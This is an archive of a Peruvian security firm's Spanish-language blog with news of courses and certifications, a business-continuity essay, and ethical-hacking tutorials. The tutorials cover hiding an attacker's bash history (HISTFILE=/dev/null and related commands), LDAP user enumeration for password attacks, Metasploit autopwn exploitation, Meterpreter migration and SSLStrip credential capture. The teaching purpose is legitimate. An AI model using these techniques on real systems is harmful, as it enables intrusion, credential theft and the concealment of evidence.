Rolando Antón Huerta, Ingeniero de Soporte, ETEK Internacional.
Mauricio Velazco Corrales, Consultor de Seguridad Informática, OpenSec.
Ricardo Supo Picón, Chief Technology Officer, LimaSoft Seguridad Informática

Fecha: Martes 24 de agosto, de 7 a 9 pm.
Lugar: Hotel José Antonio, Miraflores
Informes e Inscripciones:
Tel. 225-9342 - eMail: informacion@isaca.org.pe - Contacto administrativo: Srta. Mabel Gil

OSEH en Tarapoto

2010-07-21T12:04:00.002-05:00

Hace unos meses recibí una invitación de la universidad César Vallejo para dictar el curso Open-Sec Ethical Hacker (http://www.open-sec.com/oseh/oseh.html) en la calurosa ciudad Tarapoto.

Terminado el curso se organizó un seminario en donde se conversó de algunos temas de hacking (para variar) y además compartí la exposición con Felipe Gonzáles, un estudiante de la universidad que dió una interesante charla sobre el análisis de malware.

Siempre es interesante encontrar personas inquietadas por estos temas que muchas veces nos quitan el sueño.

Les dejo algunas fotos,

MVelazco.

Más Certificaciones! Offensive Security Certified Professional = Cesar Cuadra Pacheco

2010-06-23T03:09:00.000-05:00

Cada logro personal de un consultor en Open-Sec es recibido con mucho entusiasmo por todos nosotros y al logro reciente de Mauricio Velazco con al certificación de C|EH, hoy (ayer) debemos sumar el logro de Cesar Cuadra al haber obtenido la certificación de OSCP : Offensive Security Certified Professional.

Para los que no conocen esta certificación, es sumamente reconocida en el mundo de los hackers y ha sido creada y es manejada por los mismos creadores de BackTrack.
El examen no es convencional, es un Capture the Flag completo. A Cesar le tocó entrar a un entorno real y vulnerar la seguridad de servicios para obtener trofeos a partir de ello y asi poder demostrar su capacidad en labores de ethical hacking en un lapso de 24 horas. Alcanzó el puntaje perfecto de 100 puntos!!!
Definitivamente, Cesar es uno de los mejores hackers éticos que existen en nuestro país.
FELICITACIONES CESAR!!!

Open-Sec Ecuador nombrado ATC de EC Council

2010-06-11T12:11:00.000-05:00

Esto constituye un gran logro de Ramiro Pulgar, Gerente General de Open Sec Ecuador toda vez que el tema de entrenamiento y certificacion en Ecuador es tomado con mayor interés y tanto las empresas como las personas invierten en formarse y mantenerse vigentes demostrando sus capacidades con certificaciones internacionales.
Mediante este acuerdo, Open Sec es un ATC exclusivo en Ecuador y dentro de su territorio de venta y entrenamiento se encuentra también Perú.
Pronto más novedades concretas como próximas fechas y MEJORES precios.
http://www.concepti.com/centros-autorizados/23/open-sec-ecuador

Peruvians at Offsec !!

2010-05-10T16:34:00.007-05:00

Hace ya unas semanas la gente de Offensive Security publicó información sobre un torneo de hacking bastante interesante. El torneo fue llevado a cabo desde el sábado 8 de mayo hasta hoy. Básicamente consistió en 2 fases. La primera, como la llamaron ellos, el n00b filter, que consistía ownear un equipo y luego buscar un fichero en el sistema de archivos y utilizar esa llave.

Tan sólo los 100 primeros en pasar la fase 1 podían recibir el certificado para conectarse a la VPN y jugar la fase 2 en donde encuentras varios otros equipos y la idea es to get root.

Con el estudio, el dia de la madre y la chamba no hubo mucho tiempo para jugar, sin embargo llegamos (CCuadra,WCuestas y yo) a pasar la fase 1, obteniendo así 25 puntos.
Además, me es grato saber que otro peruano, Andrés Morales logró ownear algunos equipos de la vpn logrando obtener 75 puntos.
Peruvians in the scoreboard!!

La fase 1 consistía en explotar una vulnerabilidad de un WAF conocido que permite la ejecución de comandos remota. Aquí dejo algunos screenshots del exploit que escribi para superar el reto. He omitido alguna info dado que aun no hay un pronunciamiento oficial por parte de Offsec sobre la solución del reto.

Saludos

MVelazco

An score of 98% says that Mauricio Velazco is a Certified Ethical Hacker by EC Council...3 C|EH @ Open-Sec and counting...

2010-05-10T16:28:00.004-05:00

Para nosotros es un tema bien importante el reconocimiento a quienes demuestran feacientemente su conocimiento y el hecho que Mauricio Velazco haya obtenido el dia de hoy la certificacion de C|EH es muy importante por varias razones :
1. Es el miembro mas joven de nuestro equipo y afaik, es el C|EH mas joven en Perú con 24 años.
2. Ya lleva cerca de 2 años haciendo unicamente ehtical hacking y computación forense y el puntaje obtenido en el examen demuestra que su experiencia ayudo mucho para el examen (no llevo un curso o similar).
3. Open-Sec resulta siendo la unica empresa local que cuenta con 3 C|EH en staff permanente.
4. Este es solamente el inicio de una saga de certificaciones que obtendra Mauricio, hoy conversabamos sobre la proxima, CPTE.

FELICITACIONES MAURICIO!!!

UPDATE : El día de ayer también obtuvo su certificación como C|EH el consultor Rolando Antón. El no es parte del equipo de Open-Sec, es parte del equipo de Etek Perú, pero, es un gran amigo nuestro y mio en particular.
Dado que hoy día Mauricio Velazco cumplió 25 años, desde hoy hasta octubre de este año, Rolando es el C|EH peruano más joven (AFAIK).

FELICITACIONES ROLANDO!!!!

Charla Ethical Hacking 2008 en PUCP

2010-04-19T19:11:00.002-05:00

Este video lo teniamos en el web antiguo y por alguna razon, algunas personas lo reclamaron, sera porque les sirve o porque les resultad divertido. Como update, Carlos Renzo (el mayorcito de los 3) ya no trabaja con nosotros, pero, seguimos siendo excelentes amigos.

Linux Week y MS10_002

2010-04-07T02:31:00.006-05:00

Hace unas semanas, me invitaron a dar una charla en la quinta edicion de Linux Week que se realizo en la semana del lunes 15 hasta el viernes 19 de marzo en las instalaciones de la PUCP. Desde aqui quiero felicitar a los organizadores y agradecerles por la invitacion y el buen trato.

El tema que toque en esa oportunidad fue ataques de lado cliente en donde basicamente hablamos sobre las tendencias de los atacantes, se expuso algunos de los "ataques" mas frecuentes que vienen ocurriendo para el robo de credenciales como lo son el Phishing y el Pharming. Lo ultimo, para que los asistentes tengan conciencia de las consecuencias si no se tiene algunos criterios minimos al momento de ingresar a una url no conocida o aceptar un archivo posiblemente malicioso.

Terminamos hablando un poco sobre los relativamente recientes ataques contra Google, la denonimada "Operacion Aurora". Fue en este ultimo punto donde realice una pequeña demo donde explote la vulnerabilidad antes mencionada, una vulnerabilidad de corrupcion de memoria que afecta a Internet Explorer
en sus versiones 6 y 7. Mediante esta, un atacante crea un HTML con un codigo javascript malicioso, que al ser interpretado por un navegador afectado, permitira tomar control total del equipo. Para probar el exploit, use Metasploit.

Una vez explotada la vulnerabilidad, el payload utilizado dependera de la vida del proceso asociado. Esto es debido a que una vez llamada la shellcode, la sesion meterpreter es cargada en el espacio de memoria asignado al proceso explotado, en este caso, iexplorer.exe. Si el navegador se cuelga por el ataque o si la victima simplemente deja de navegar y cierra el Internet Explorer, se libera la memoria, ergo, perdemos la sesion.

Para evitar este escenario, metasploit nos facilita la vida con la funcionalidad de migrar de proceso. Podemos automatizar esto escribiendo un script para que una vez conseguidos los privilegios, creemos un nuevo proceso y migremos a este. Tan solo seteamos el valor AutoRunScript.

Aqui les dejo el script utilizado

Ah, y la presentacion.

Client Side Attacks- LinuxWeek 2010

View more presentations from mvelazco.

Saludos!

MVelazco.

P.D: Tildes omitidas intencionalmente

GPEN versus GCIH : Una pequeña, pero, IMPORTANTE DIFERENCIA

2010-04-02T23:02:00.000-05:00

En un medio con el nuestro (Perú) donde las certificaciones en tema de seguridad estan en la etapa 0 (apenas algunos se han certificado y no es exigencia para realizar labores relacionadas), resulta importante hacer siempre precisiones y dado el prestigio del entrenamiento de SANS y las certificaciones de GIAC, es importante comprender algunas diferencias y no dejar que nos den gato por liebre.

En diás pasados se aperturó una lista de correo para un grupo de personas con certificaciones de GIAC o alumnis de SANS respecto a ciertos cursos (relacionados los 3 a penetration testing) y luego se aperturó a los certificados y alumnis de manejo de incidentes. Esto dió lugar a unas opiniones de los creadores, gestionadores e instructores de estos cursos de las cuales se puede extraer :

"504 is more geared to incident response than penetration testing." -Ed Skoudis
(504 es el código del curso que conduce a la certificación GCIH)

"Thanks for including 504. I took 504 and then tried my new skills out by
attempting an internal pen test against my environment (with written
permission, of course!) and found I was lacking. Although I had the tools
and some skills, the 560 class brought it all together for me as far as a
formal procedure of defining a scope and compiling a report. I think 504
and 560 should be taught together in a two-week SANS Ultra Brain Dump Uber
Course. They certainly complement each other. "
- Tony K. Reusser
(560 es el código del curso que conduce a la certificación GPEN).

4 Nuevos OSEH (Open-Sec Ethical Hacker)

2010-03-10T16:19:00.000-05:00

El fin de semana último realizamos otro curso de ethical hacking donde enseñamos las técnicas de ataque que aplicamos en los servicios que realizamos.
Es interesante como los participantes poco a poco van engarzando las diferentes etapas de una penetración de forma casi natural.
Tuvimos especial énfasis en temas de hacking de aplicaciones web, incluso, Camilo Galdos (Dr. White) participó dando una charla al respecto. Obviamente, los participantes quedaron sorprendidos por su juventud y capacidad.
También, tuvimos otra vez un laboratorio en particular sobre hacking de redes wifi.
Así mismo, los participantes pudieron analizar los hechos del "defacement" que sufrimos, aprender a diferencia un verdadero defacemente de un "defacemente", conocer sobre los autores y complices, los "motivadores", analizar "evidencias" públicas y comprender como no siempre las cosas son lo que parecen.
Al final, se llevó a cabo la evaluación con el examen de OSEH que nos permite contar con 4 personas más que han certificado el contar con un nivel elemental en temas de ethical hacking (ya llevamos 30 certificados).
A continuación, algunas imágenes :

Metagoofil enhanced

2010-02-19T15:00:00.000-05:00

Como verán, estamos siendo más productivos con el blog (será porque se acerca el 2012 y queremos ser famosos ? jejeje...).

Siempre hemos dicho en presentaciones, en conversaciones con los clientes y en los entrenamientos que para nosotros usar herramientas Open Source es vital porque podemos modificarlas según necesitemos sin esperar que el proyecto que las origina lo haga y seria peor si se tratáse de herramientas comerciales o simplemente gratuitas (pero, a cuyo código fuente no tenemos acceso).

Una de las primeras herramientas que modificamos para manejar adecuadamente algunos cambios en Google y algunas formas de búsqueda es metagoofil, herramienta desarrollada y mantenida por Edge-Security Research y la cual hemos modificado "ligeramente" (incluso, los remito al web de ellos para revisar la excelente documentación creada para esta t00l http://www.edge-security.com/metagoofil.php )

Por favor, como siempre les decimos a todos : descarguen esta versión, revisen el código, asegurense que no tiene un troyano o similar y luego de eso, usenla.

El programa esta comentado para un mejor entendimiento.

Descarga : Metagoofil.py

Hiding Tracks with .bash_profile

2010-02-16T19:27:00.007-05:00

Buscando maneras en las que un atacante puede minimizar sus huellas en un sistema *nix comprometido, encuentro, gracias a MUrizar, con una simple y eficaz forma de hacerlo.

Al añadir una línea al fichero .bash_profile (tambien funciona en .bashrc), podemos lograr que todo comando precedido de un espacio en blanco, no sea guardado en el historial de comandos del usuario (.bash_history).

export HISTCONTROL=ignorespace

Esto puede funcionar en un escenario donde se quiera evitar el uso de rootkits o zappers para borrar evidencias. Hay otras formas de hacerlo pero me gustó esta por su simplicidad. Lo importante es no olvidarse de añadir el espacio en blanco !

Desde luego, esto no servirá de nada para ocultar la presencia del atacante si el admin utiliza comandos como w, who, users, last y lastlog que mostrarán información sobre usuarios y sus logins. Una manera de evitar esto sería modificando los ficheros parseados por estos comandos para mostrar su output:

/var/run/utmp
/var/log/wtmp

Tal ves eso para otra ocasión,

MVelazco

Update 1

Conversando con WCuestas y buscando evitar añadir un espacio en blanco antes de todo comando ingresado, me sugiere una forma mucho más práctica de realizar la misma tarea sin tener que hacer cambios en ningún archivo.

Nos enfocamos en 2 variables de entorno de bash, $HISTSIZE y $HISTFILE. Cada una guarda el valor del número de líneas guardados en el historial y el fichero donde se guardará el historial, respectivamente.
Una imagen vale más:

Bien, entonces jugando con esas variables podemos conseguir que en una nueva sesión, no se guarde historial de comandos ejecutando lo siguiente:

HISTSIZE=0; export HISTSIZE
HISTFILE=/dev/null; export HISTFILE

Lo interesante es que en la próxima sesión, las variables serán cargadas según lo dictado en .bashrc, así que para el admin todo esto es transparente, aqui no paso nada!.

Enumeracion LDAP

2009-12-07T15:15:00.001-05:00

Hola a todos. Lamentablemente el trabajo hace algo difícil el postear nuevo contenido en este blog, sin embargo, y después de un buen tiempo, me siento a escribir un nuevo post para las personas que de cuando en vez sintonizan este canal.

En esta oportunidad quiero enfocarme en un tema que no siempre aparece en un proyecto de Ethical Hacking, tal es el caso del password cracking. Voy a tocar algo de teoría (bibliografía: www.google.com), definir un probable escenario y dar algunos tips para obtener usuarios válidos dentro de un dominio o un servidor LDAP.

Primero vamos a definir el término "password cracking", según wikipedia:

El password cracking es un proceso informático que consiste en descifrar la contraseña de determinadas aplicaciones elegidas por el usuario. Se trata del rompimiento o desciframiento de claves (passwords).

Un concepto bastante conocido, sin embargo, muchos se preguntarán para qué sirve en un proyecto de Ethical Hacking. Pues para auditar la robustez (o la falta) de políticas de passwords utilizadas en una organización. Como toda etapa del EH, busca tomar evidencias para emitir una recomendación de mejora. En este caso, por ejemplo, si nos encontramos con el password "123456" en un servicio importante la recomendación es implementar una política de passwords que tenga en cuenta entre otras cosas la longitud, el tiempo de expiración, no utilizar palabras de diccionario, no usar cumpleaños, etc. Un buen recurso aquí: www.sans.org/security-resources/policies/Password_Policy.pdf
También pueden realizar una búsqueda con los términos: "password policy", "password policy standard" en nuestro amigo google, seguro dará buenos resultados.

Ahora el escenario. Estamos realizando un EH interno y llegamos a la etapa de password cracking. El cliente ya eligió a qué servicios se hará el test, tenemos un servidor de correos y un servicio de intranet. Tenemos a nuestra disposición varios diccionarios de passwords de varios temas y en distintos idiomas. El problema surge: Si queremos que el test tenga los resultados esperados, ¿qué diccionario de usuarios utilizar?.

Es aqui donde nos aprovechamos de un recurso muy utilizado en redes basadas en Windows, el Active Directory. El directorio activo es la implementación de Windows de LDAP (Lightweight Directory Access Protocol) que contiene un árbol jerarquizado de objetos categorizados. Permite a los administradores de red realizar tareas como establecer políticas , desplegar programas en muchos ordenadores y aplicar actualizaciones críticas a toda la organización. Para nuestros fines, nos centraremos en sólo un tipo de objeto contenido en el árbol: los usuarios.

En resumen, para crear el diccionario vamos a enumerar los usuarios del directorio activo o del servidor LDAP haciendo consultas al árbol y de esta forma armar una base de datos con los nombres de usuario registrados para lanzar el test de password cracking. Tenemos diferentes estrategias para lograr el objetivo de acuerdo al tipo de evaluación:

Black Box.

En este caso intentamos una conexión anónima al servidor LDAP, para el caso de controladores de dominio en Microsoft Windows 2000 lo más probable es que podamos realizar esta enumeración anónima sin problemas.
Otra estrategia es escuchar el tráfico en la red para poder obtener un usuario y contraseña válidos y con estas credenciales realizar la enumeración LDAP.
Además es posible extraer credenciales válidas de diversas formas, como por ejemplo mediante las credenciales de un sistema transaccional a la base de datos, y otras más.

Gray Box y White Box.

Podemos utilizar las credenciales de un usuario del dominio, o de una cuenta de correo.
En el 90% de organizaciones en las que he participado en un EH interno la salida a internet es filtrada por medio de un proxy a manera de aumentar la velocidad (a traves de la cache) y restringir a los usuarios según sus privilegios (utilizando el directorio activo). Así que también se puede utilizar estas credenciales.

Pasos a Seguir.

Primero es necesario identificar al DA:

nmap -p389 --open 10.0.0.0/24

En el caso del controlador de dominio el servidor LDAP suele estar en el servidor que utilizamos como DNS.

Una vez identificado el servicio necesitamos hacerle las consultas, pero cómo?? En este caso utilizaremos la herramienta ldapsearch que viene con el paquete ldap-utils. Ok, aprendamos a usar ldapsearch:

man ldapsearch

Luego de leer la pagina del man, buscar ejemplos en google y preguntarle al colega :P, obtenemos el comando.

ldapsearch "objectclass=user" -h 10.0.0.43 -b "dc=organizacion,dc=com,dc=pe" -D "usuario@organizacion.com.pe" -w "passw0rd" > ldapdump.txt

"objectclass=user" Para determinar que solo queremos consultar a objetos del tipo "user"
-h La ip del Directorio Activo
-b La base del directorio LDAP
-D El usuario con el que nos conectamos al servidor
-w El password del usuario
> Dumpeamos todo en un fichero de nombre ldapdump.txt

Wow tenemos un archivo con 64903 lineas! Que buscamos??. En la imagen observamos la entrada de un usuario (alguna información fue cambiada y otra escondida por obvias razones). Ldapsearch nos retorna mucha información sobre el usuario como grupos a los cuales pertenece, la última vez que se logueó en el dominio, quota de la cuenta del correo, etc, etc. Pero a nosotros sólo nos interesa el nombre de usuario. Ese dato se encuentra en la variable "sAMAccountName". Ese es el usuario con el que se loguea a los servicios.

Aprovechamos el poder de nuestra shell bash para cortar el archivo y sólo sacar los usuarios del archivo de texto utilizando los comandos grep, cut y sort.

cat ldapdump.txt | grep 'sAMAccountName' | cut -d' ' -f2 | sort > usersDominio.txt

En la imagen se puede ver el resultado.

El resultado, un fichero de 888 lineas donde cada linea es un usuario.

Done, contamos con una base de datos de todos los usuarios registrados en el dominio. Ahora es momento de utilizar la herramientas de password cracking con la que se sientan más cómodos. Recomiendo Hydra.

Esto es todo, espero les haya gustado, y no duden en dar comentarios/dudas/críticas/quejas.

Gracias a CCuadra por la revisión,

saludos

MVelazco.

Plan de Continuidad del Negocio

2009-04-06T13:40:00.000-05:00

Un Plan de Continuidad del Negocio, garantiza la no interrupción de procesos críticos dentro de un negocio. En tecnologías de información, se maneja el mismo concepto y es hacia dónde vamos a orientar el desarrollo del presente tema.

El desarrollo de un Plan de Continuidad del Negocio o BCP (por sus siglas en ingles, las cuales significan Business Continuity Plan), debería contemplar 5 aspectos básicos como parte de su ciclo de vida, estos son:

Análisis.
Diseño de la solución.
Implementación.
Pruebas y aceptación del Plan.
Mantenimiento.

El análisis consiste en identificar los procesos críticos de TI que mantienen en correcto funcionamiento el desarrollo de las actividades de la corporación en general, entendiéndose que en la nueva teoría de administración de empresas, el Área de TI que antes era un departamento de apoyo a la toma de decisiones y soporte a las actividades empresariales, ha pasado a ser una de las áreas funcionales en todo negocio, así como lo es Recursos Humanos, Logística, Finanzas o Ventas.

En lo referente a Diseño de la Solución vamos a detallar como proteger estos procesos que identificamos en la fase anterior, en la medida de lo posible se debe intentar mantener en un funcionamiento “aceptable” los procesos críticos del negocio que son apoyados en la infraestructura informática de la empresa. En esta etapa se elaboran los Planes de Recuperación ante Desastres o DRP (Disaster Recovery Plans) por sus siglas en ingles. Debe entenderse como desastre toda situación que hace compromete la seguridad de la infraestructura informática o incluso puede llegar a convertirla en no disponible. Los desastres se pueden clasificar principalmente en: Desastres naturales, que por su misma naturaleza, son casi imposibles de predecir y a la vez de afrontar. Por otro lado tenemos desastres a causa de un error humano, estos últimos en la mayoría de los casos son más fáciles de reparar.

La Implementación es probablemente lo más difícil ya que el impacto que puede tener el implementar un BCMS (Business Continuity Management System) – Sistema de Administración de Continuidad del Negocio – es complicado ya que además de involucrar personal para invertir tiempo en el desarrollo del mismo, puede tener un impacto económico considerable dependiendo del alcance y es aquí en donde debemos de preguntarnos: ¿Cual es el impacto de la caída de algún servicio informático critico para la organización y hasta donde nos podría costar la no disponibilidad del mismo? Por ejemplo, una empresa de seguros que no tiene la base de datos de contratos de clientes y coberturas al momento que un cliente es víctima de algún siniestro se puede convertir en un problema bastante grande que incluso podría tener implicancias legales, mucho peor si se trata de un siniestro que pone en riesgo la vida de una persona como lo sería un seguro de salud. Si un cliente sufre una amenaza de infarto y alguien solicita ayuda, puede resultar en el fallecimiento del cliente. Probablemente sea un caso excesivo sin embargo no es una situación imposible de presentarse para el tipo de negocio que hemos puesto de ejemplo que es una empresa de seguros.

En cuanto a las pruebas, estas deben ser rigurosas, asegurando que realmente la estrategia de BCP es medible bajo dos puntos de vista: Retribución de la inversión y Garantía de Continuidad. Es aquí en donde se muestra el valor real que tienen los DRP creados en la segunda fase. Por último hay un tema de aceptación que debe ser sostenido ante un directorio con los “Tomadores de Decisión” de la corporación.
Finalmente, como cualquier sistema, este debe tener un proceso de mantenimiento continuo, que garantice el correcto funcionamiento del mismo además de que la estrategia inicial no haya cambiado y de ser este el caso, el mantenimiento hará que la estrategia sea actualizada. Conforme el Área de TI vaya cambiando, así mismo se deberá hacer ajustes en la estrategia inicial de tal manera que esta siga teniendo un valor real para la organización.

El tema de BCP en cuanto a TI se refiere va mas allá de tan solo redundancia en servicios, replicas de bases de datos o ejecución de copias de respaldo, ya que hablamos de copias de respaldo, es interesante ver como siempre nos estamos preocupando de hacer copias de respaldo de la información, sin embargo las guardamos en el mismo lugar en donde queda nuestra oficina. Si ocurriera un incendio en el edificio en donde se ubica esta oficina no nos serviría de nada, cierto? La información se quemaría así como los demás bienes de la empresa, dejándonos imposibilitados de poder restaurarla al adquirir nuevos equipos, es por esta razón que una de las buenas prácticas nos dice que las copias de respaldo no se deben almacenar en el mismo lugar físico en donde se encuentra la empresa ni cerca. En algunos países esta recomendación es llevada a cabo de una forma interesante y es que se hacen alianzas de protección de información, las cuales consisten por ejemplo en que la empresa A almacena las copias de respaldo de la empresa B, cabe resaltar que por mas relación de confianza que haya entre dichas empresas siempre hay consideraciones que se deben tener como por ejemplo intercambiar las medias encriptadas y en cajas que utilicen precintos de seguridad inclusive el uso de una caja fuerte no estaría de más.

Para terminar, enfoquemos el tema de un BCP no solo como una manera de mantenerse a flote sino como una estrategia que mantiene la buena reputación de nuestra organización o acaso nos gustaría que nuestros clientes se quejen de la falta de disponibilidad de nuestros servicios porque algún sistema de información falla o no está disponible en el momento requerido?

Autoexplotación con Metasploit

2009-03-31T16:57:00.001-05:00

Bueno este es un tutorial que muestra el uso de metasploit con su modulo de autopwn, mediante un video que se encuentra mas adelante e imágenes; existen varios tutoriales en internet pero no he encontrado ninguno en español y que resuelva los problemas que me fui encontrando en el camino, es por eso que me he tomado la molestia de realizar este tutorial.

La arquitectura que utilice fue OpenSuse 11.1 como explotador (IP 192.168.137.50) y Windows 2000 Professional SP4 como explotado (IP 192.168.137.55).

Instalaciones:

Lo primero y esencial es instalar nmap, preferiblemente instalarlo de fuentes (http://nmap.org/dist/nmap-4.76.tar.bz2)
Instalar Nessus desde http://www.nessus.org/download/
Instalar Postgres Server, en este caso lo instale desde rpm por el Yast.
Instalar Ruby DESDE FUENTES, aqui es donde tuve pequeños problemas ya que la versión de Ruby que viene en OpenSuse que es Ruby-1.8.7 NO SIRVE, la versión que instale fue la última versión estable SVN (ftp://ftp.ruby-lang.org/pub/ruby/stable-snapshot.tar.gz).
Instalar RubyGems DESDE FUENTES, la versión que utilice fue la 1.0.0 (http://rubyforge.org/frs/download.php/29516/rubygems-1.0.0.tgz).
Instalar el ActiveRecord: # gem install activerecord
Instalar el driver de postgres: # gem install postgres
Por último instalar Metasploit desde SVN, como se muestra en http://www.metasploit.com/framework/download/

El objetivo de este tutorial es trabajar con metasploit con su modulo autopwn, y para realizar esto importaremos un archivo nessus (nbe) a metasploit.

Lo primero que vamos hacer es correr nmap desde consola (nmap -v -A -sC -p 1-65535 -P0 --reason -oA /root/Desktop/autopwn/nmap_autopwn 192.168.137.55) y que nos dé los resultados en sus tres formatos.

Luego iniciaremos Nessus y exportaremos el archivo *.gnmap a la política que vayamos a crear. Terminado el escaneo de nessus, exportamos el resultado a un archivo *.nbe. (El uso de nmap y nessus escapa al objetivo de este tutorial).

--El video empieza desde este punto--

Listo ahora vayamos a iniciar una instancia de postgres; para realizar esto necesitaremos cambiarnos de usuario ya que root no permite realizar esta acción, hacemos lo siguiente:

# su “usuario”

$ cd /home/”usuario”

$ initdb ~/metasploitdb (Creación de la instancia)
$ pg_ctl -D ~/metasploitdb start (Inicio de postgres)

$ su - (para regresar a root)

Ya tenemos una instancia de postgres iniciada, entonces ahora podemos trabajar con metasploit y lo iniciamos en modo consola:

# cd /root/Programas/metasploit (donde se encuentra mestasploit)

# ./msfconsole

Ahora cargamos postgres en el metasploit con el siguiente comando:

msf > load db_postgres

NOTA: Una vez que cargamos postgres en el metasploit aparecerán nuevos comandos como db_create o db_destroy, etc.

Y luego creamos la base de datos con el siguiente comando:

msf > db_create “usuario”:”passw”@localhost:5432/metasploitdb

Donde: usuario: es el usuario que utilizamos para iniciar la instancia del postgres

passw: cualquier contraseña a utilizar

localhost: porque la instancia de postgres se encuentra en nuestra máquina

5432: puerto que utiliza postgres

metasploitdb: nombre de la base de datos, la cual hemos instanciado

IMPORTANTE: es necesario ingresar todos los parámetros ya que si obviamos uno, no se creará ninguna base de datos.

Nos pedirá ingresar una contraseña, pues entonces ingresamos la misma contraseña que colocamos en el comando explicado arriba.

NOTA: Una vez creada la base de datos aparecerán nuevos comandos como db_hosts, db_services, db_import_*, etc.

Ahora nos toca importar el archivo *.nbe a la base de datos, para eso utilizamos el siguiente comando:

msf > db_import_nessus_nbe “ruta donde se encuentra el archivo”

NOTA: Una vez importada la base de datos mediante los comandos “db_hosts” y “db_services” podemos ver la información que se encuentra en la base de datos.

Ahora que tenemos la base de datos llena, podemos comenzar hacer la explotación automática; mediante el comando en solitario “db_autopwn” podemos apreciar las siguientes opciones:

msf > db_autopwn

[*] Usage: db_autopwn [options]

-h Display this help text

-t Show all matching exploit modules

-x Select modules based on vulnerability references

-p Select modules based on open ports

-e Launch exploits against all matched targets

-r Use a reverse connect shell

-b Use a bind shell on a random port

-q Disable exploit module output

-I [range] Only exploit hosts inside this range

-X [range] Always exclude hosts inside this range

-PI [range] Only exploit hosts with these ports open

-PX [range] Always exclude hosts with these ports open

-m [regex] Only run modules whose name matches the regex

Para sólo ver los exploits que tenemos disponibles para atacar, basados en los puertos que tenemos abiertos, ingresamos el comando:

msf > db_autopwn -t -p

Para sólo ver los exploits que tenemos disponibles para atacar, basados en las vulnerabilidades que tenemos, ingresamos el comando:

msf > db_autopwn -t –x

Listo ya tenemos todo preparado, ahora toca lo más interesante, LA EXPLOTACIÓN, bien pues vamos a explotar el objetivo basándonos en sus vulnerabilidades descubiertas por nessus, entonces ingresamos el siguiente comando:

msf > db_autopwn -t -x -e

Y empieza la explotación.

Al finalizar podremos ver las sesiones creadas durante la explotación con el comando:

msf > sessions –l

Para seleccionar la sesión que queremos, ingresamos el comando:

msf > sessions -i N (donde N es el ID de la sesión)

Vamos a seleccionar la sesión 1 y se generará un CMD de la máquina explotada.

Para finalizar creamos un archivo *.txt y lo colocamos en el escritorio de la máquina explotada.

NOTAS FINALES:

El comando db_nmap es el ejecutable /bin/nmap embebido en el metasploit, si utilizamos el comando db_nmap desde metasploit, el resultado se cargará automáticamente en la base de datos creada.
Se puede realizar la importación de un resultado de nmap en archivo *.xml con el comando db_import_nmap_xml como lo hicimos con el archivo de nessus.
Si se quiere realizar otro análisis distinto y se cargan los datos en la misma base de datos, la autoexplotación de metasploit lo hará a todos los hosts que se encuentren en la base de datos, es recomendable crear nuevamente la base de datos pero bajo el riesgo de perder los datos ingresados anteriormente.

Bueno eso es todo, hasta el próximo post…

VIDEO

SSLStrip

2009-03-19T19:20:00.000-05:00

Aprovechando que estuve probando una nueva herramienta, me atrevo a escribir unas líneas para plasmar aquí los resultados, lo aprendido y una que otra divagación propia de una mente ávida de conocimiento.

Como sabemos, hace menos de un mes tuvo lugar la conferencia blackhat, esta vez en Washington. Dentro de las muchas presentaciones, una, expuesta por Moxie Marlinspike abordaba la seguridad de SSL, en específico, la charla se llama New Techniques for defeating SSL. Para Marlinspike la investigación de este tema no es nueva, de hecho, en el 2002 liberó la herramienta sslsniff que aprovechaba un error en la implementación de SSL de algunos navegadores para firmar el certificado de un dominio, con otro, engañando al usuario.

El ataque se basaba en la cadena de confianza, técnicamente hablando utilizaba la cadena de certificados para lograr su objetivo. Una autoridad certificadora válida (CA) firma un certificado válido, pero este último certificado no deberia poder ser usado para firmar mas certificados, obvio no?. Sin embargo, debido a una mala implementación y la no especificación ni lectura del campo basicConstraints, un atacante dueño de un certificado válido, a través de sslsniff que utiliza openssl, firma un certificado fraudulento y dado que la ruta de certificación es válida, el navegador víctima lo toma como válido. Esto significa que cualquiera con un certificado válido podía (ya no es posible debido a que ya fue corregido) crear y firmar otro certificado válido para cualquier otro dominio.
Más info sobre este bug: Aqui. Y el advisor.

En esta oportunidad, la herramienta presentada, sslstrip, no explota una vulnerabilidad propiamente dicha, sino que implementa una ingeniosa manera de engañar a un usuario haciéndole creer que se encuentra en una comunicación cifrada HTTPS cuando en realidad todo el tráfico es HTTP en texto plano. SSLStrip está desarrollado en python y no es otra cosa que un servidor proxy transparente que hace algunas cosas inusuales.

Actualmente el ataque que conozco para "jugar" con comunicaciones HTTPS consta de un MITM con envenamiento ARP. Sin embargo, cualquier usuario avispado dudará en ingresar sus credenciales luego de la advertencia presentada por el navegador respecto al famoso certificado inválido. Hace poco me comentaban que herramientas como ettercap mejoran esta técnica al tomar la información del certificado válido como el Common Name la exponen en el certificado creado por la herramienta para hacer confiar al usuario. Sin embargo, la advertencia siempre se mostrará, y eso no queremos.

La advertencia es mostrada debido a que se crea una comunicación segura en los 2 canales del envenamiento ARP, es decir, uno entre el usuario y el atacante y otro entre el atacante y el servidor Web. Dado esto, es el atacante quien crea su certificado "self signed" y al comprobar el browser del usuario, determinará que no es vállido mostrando esa fea advertencia.

He aquí la innovación de SSLStrip: entre el atacante y el usuario existe una comunicación HTTP sin cifrar y entre el atacante y el Web server existe la comunicación cifrada (Ver imagen). Para esto, SSLStrip que básicamente funciona como un proxy que intercepta comunicaciones HTTP, previo ARP Poison, analiza el tráfico enviado por el usuario y sustituye las comunicaciones cifradas por no cifradas de manera que el usuario visualiza la página que busca, pero sin cifrar. Esto se logra simplemente cambiando cualquier dirección que apunte a un recurso https por un http ya sea links href o redireciones Location.

Esto es posible debido a que normalmente, para llegar a un recurso cifrado HTTPS primero se ingresa mediante HTTP, es decir, la mayoría de veces la única manera de llegar a un cifrado SSL se da a través de links (href) y redirecciones (Location). Me pregunto ¿cuántas personas ingresan a un portal web escribiendo el https adelante?. De hecho conozco varios, incluso algunos demasiado neuróticos al punto que sólo quieren chatear por canales cifrados o que paran con un token en el bolsillo para conectarse a la VPN de su casa para de ahi navegar seguro jajaja, pero son pocos.

Regresando al tema, existen páginas muy conocidas, que presentan todo en HTTP y tan sólo son los Form Action los que apuntan a recursos https entre ellas conocidos bancos gringos o un proveeder de webmail muuuy conocido. Dado esto, SSLStrip sólo tiene que cambiar el link del Form Action para que las credenciales sean enviadas por HTTP logrando capturar las credenciales y significando esto ninguna diferencia para el usuario en cuanto a la visualización.

Veamos como SSLStrip hace el cambio y los resultados conseguidos.

Esta es la versión de el formulario de logueo de Google segura.

Esta es la versión de el formulario de logueo de Google con SSLStrip.

De misma forma, PayPal seguro:

Paypal inseguro:

